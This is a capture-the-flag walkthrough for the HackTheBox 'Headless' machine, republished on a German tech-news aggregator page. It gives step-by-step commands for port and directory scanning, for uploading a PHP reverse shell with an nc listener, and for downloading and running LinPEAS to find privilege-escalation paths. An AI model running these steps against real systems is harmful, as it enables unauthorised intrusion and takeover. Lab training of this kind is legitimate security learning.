🕵️ SicherheitslückenHak5: Hackers Just Poisoned the Rust Supply Chain | Threat Wire(01.09.2026 um 14:00 Uhr)
🕵️ SicherheitslückenHak5: Hackers Found a Way Into Humanoid Robots | Threat Wire(04.09.2026 um 15:04 Uhr)
🔧 AI Nachrichten Bits und so #1021 (Passwort für Laufwerk)(31.08.2026 um 22:15 Uhr)
🔧 AI Nachrichten Bits und so #1022 (Wie Weißbier)(06.09.2026 um 20:39 Uhr)
🍏 iOS / Mac OSHue-App 6.0 ist da: das sind die Neuerungen(07.09.2026 um 17:21 Uhr)
🕵️ SicherheitslückenHak5: Hackers Just Poisoned the Rust Supply Chain | Threat Wire(01.09.2026 um 14:00 Uhr)
🕵️ SicherheitslückenHak5: Hackers Found a Way Into Humanoid Robots | Threat Wire(04.09.2026 um 15:04 Uhr)
🔧 AI Nachrichten Bits und so #1021 (Passwort für Laufwerk)(31.08.2026 um 22:15 Uhr)
🔧 AI Nachrichten Bits und so #1022 (Wie Weißbier)(06.09.2026 um 20:39 Uhr)
🍏 iOS / Mac OSHue-App 6.0 ist da: das sind die Neuerungen(07.09.2026 um 17:21 Uhr)

🔧 Programmierung 🕛 kürzlich 3 Min Lesezeit
0

HackTheBox Headles Walkthrough

↗ Quelle (dev.to)
🗣️ Stimme:




Headless



Step 1: Reconnaissance



Start by scanning the machine with Nmap to identify open ports and services.




CODE
nmap -sC -sV -oN headless.nmap <machine-ip>









  • sC: Run default scripts.


  • sV: Detect service versions.


  • oN: Output scan results to a file.



Expected Output:




CODE
PORT    STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 (Debian)







From the scan, we learn that the server is running SSH on port 22 and Apache HTTP on port 80.



Step 2: Web Enumeration



Let’s check the web server on port 80 by navigating to http://<machine-ip> in your browser. You should see a basic web page. Next, we’ll use Gobuster to enumerate directories.




CODE
gobuster dir -u http://<machine-ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt







Expected Output:




CODE
/.hta                 (Status: 403) [Size: 294]
/.htaccess (Status: 403) [Size: 294]
/.htpasswd (Status: 403) [Size: 294]
/robots.txt (Status: 200) [Size: 28]







There is a robots.txt file. Let’s inspect it:




CODE
curl http://<machine-ip>/robots.txt







Expected Output:




CODE
User-agent: *
Disallow: /upload







This file disallows access to the /upload directory, which is worth checking out. Visit http://<machine-ip>/upload in your browser, and you should find an upload form.



Step 3: Exploiting the File Upload



Try uploading a simple PHP reverse shell to the server. You can get one from PentestMonkey.



First, download the reverse shell:




CODE
wget <https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php>







Open the file and modify the IP address and port to match your attacking machine:




CODE
nano php-reverse-shell.php







Change:




CODE
$ip = 'your-ip'; // IP address of your machine
$port = 4444; // Port on which your listener will run







Now, attempt to upload the PHP shell via the web form. Once uploaded, you can access it through the URL:




CODE
http://<machine-ip>/upload/your_shell.php







But before visiting the URL, set up a listener on your machine using Netcat:




CODE
nc -lvnp 4444







If the upload is successful, visiting the PHP file should trigger the reverse shell, and you should get a connection.



Step 4: Gaining a Shell



Once you have a reverse shell, stabilize it:




CODE
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm







Step 5: Privilege Escalation



Let’s enumerate the system for privilege escalation possibilities. Start by checking sudo privileges:




CODE
sudo -l







If no immediate sudo privileges are available, check for SUID binaries:




CODE
find / -perm -u=s -type f 2>/dev/null







Alternatively, you can use LinPEAS to automate the enumeration process. Download and execute it:




CODE
wget <https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh>
chmod +x linpeas.sh
./linpeas.sh







Step 6: Exploiting a Vulnerability



During the enumeration, you may find an exploitable vulnerability, such as a misconfigured service, outdated software, or a SUID binary that can be abused for privilege escalation. Follow through with the appropriate exploit method depending on the findings.



Step 7: Capture the Flags



Once you escalate privileges to root, navigate to the home directories to find the flags.



For the user flag:




CODE
cat /home/<username>/user.txt







For the root flag:




CODE
cat /root/root.txt







Conclusion



With that, you’ve completed the Headless box on Hack The Box. Remember, the specific vulnerability exploited might vary based on enumeration results, so always adapt based on what you find during enumeration.

Vollständiger Original-Bericht
Ausführliche Details, Code-Beispiele & Hersteller-Stellungnahme auf dev.to.
↗ Original-Artikel auf dev.to lesen
Wie bewertest du diesen Beitrag?
1 Klick Feedback
Teilen mit Netzwerk & Team:

Community-Analysen & Experten-Meinungen 0

Verfasse deine eigene Analyse, teile Workarounds oder diskutiere diesen Vorfall im Blog.
Noch keine Community-Analyse verfasst. Markiere einen Textabschnitt oder klicke oben auf Eigene Analyse verfassen“!
Community Pulse: Relevanz-Einschätzung
1 Klick Experten-Votum
🔴 Akute Relevanz 0%
🟡 In Evaluierung 0%
🟢 Keine Auswirkung 0%
Spannende Innovation 0%
Verwandte Story-Cluster & Quellen (Vektor-KI)
Port 8095 Engine
1 Quelle
Hackers Just Poisoned the Rust Supply Chain | Threat Wire
1 Quelle
Hackers Found a Way Into Humanoid Robots | Threat Wire
1 Quelle
Bits und so #1021 (Passwort für Laufwerk)
Ähnliche Beiträge
🔍 Verwandte News

Auch interessante Nachrichten HackTheBox Headles Walkthrough

Thematisch verwandte Begriffe: HackTheBox, Headles, Walkthrough · 6 Treffer

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...